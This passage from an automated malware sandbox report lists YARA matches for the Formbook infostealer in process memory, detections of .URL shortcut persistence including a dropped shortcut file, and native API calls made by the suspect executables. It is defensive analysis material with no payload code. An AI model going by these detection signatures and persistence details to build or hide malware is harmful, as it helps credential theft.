Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.584057831.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561221425.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.562432544.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584430165.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497196939.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497027305.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583809882.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561955738.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583259344.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583847406.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.496929665.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583317580.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583980388.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.497250611.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583904644.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560450286.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497289431.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560538390.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.562142811.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497089082.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.562245816.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583483116.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497109502.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584129270.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583705715.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584336021.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560383083.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561149693.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561547476.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497453789.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583441882.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584088819.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497486545.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.584234578.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584506071.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560320590.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497066247.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497151468.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497352648.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497402362.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497007493.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497047805.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.497310666.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497216692.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561741705.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583353394.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.496970511.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497375359.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561654798.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560760985.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583951721.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560713668.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497129768.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497173543.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560263078.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.496988721.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584197318.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583532798.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584010373.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560188388.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.496950369.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583656067.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583176269.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497333632.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561086888.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561847558.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583592654.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561433212.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560491541.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: Process Memory Space: Odhbljup.exe PID: 2192, type: MEMORYSTR Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\pujlbhdO.url, type: DROPPED Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 004042E4 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 004067E4 appears 61 times
Source: C:\Users\user\Odhbljup.exe Code function: String function: 004038F8 appears 44 times
Source: C:\Users\user\Odhbljup.exe Code function: String function: 004049F0 appears 38 times
Source: C:\Users\user\Odhbljup.exe Code function: String function: 004042E4 appears 162 times
Source: C:\Users\user\Odhbljup.exe Code function: String function: 0040E2B4 appears 42 times
Source: C:\Users\user\Odhbljup.exe Code function: String function: 0040F5BC appears 44 times
Source: C:\Users\user\Odhbljup.exe Code function: String function: 004067E4 appears 122 times
Source: C:\Users\user\Odhbljup.exe Code function: String function: 00404308 appears 46 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 02013F92 appears 132 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 0201373B appears 248 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 01FCE2A8 appears 58 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 01FCDF5C appears 124 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 0203F970 appears 84 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_00450FCC NtdllDefWindowProc_A, 4_2_00450FCC
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 4_2_0044629C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00436A08 NtdllDefWindowProc_A,GetCapture, 4_2_00436A08
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_00451770
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 4_2_00451820
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042BE54 NtdllDefWindowProc_A, 4_2_0042BE54
Source: C:\Users\Public\vbc.exe Code function: 4_2_02128690 NtReadFile, 4_2_02128690
Source: C:\Users\Public\vbc.exe Code function: 4_2_021287C0 NtAllocateVirtualMemory, 4_2_021287C0
Source: C:\Users\Public\vbc.exe Code function: 4_2_021285E0 NtCreateFile, 4_2_021285E0
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_00450FCC NtdllDefWindowProc_A, 7_2_00450FCC
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 7_2_0044629C
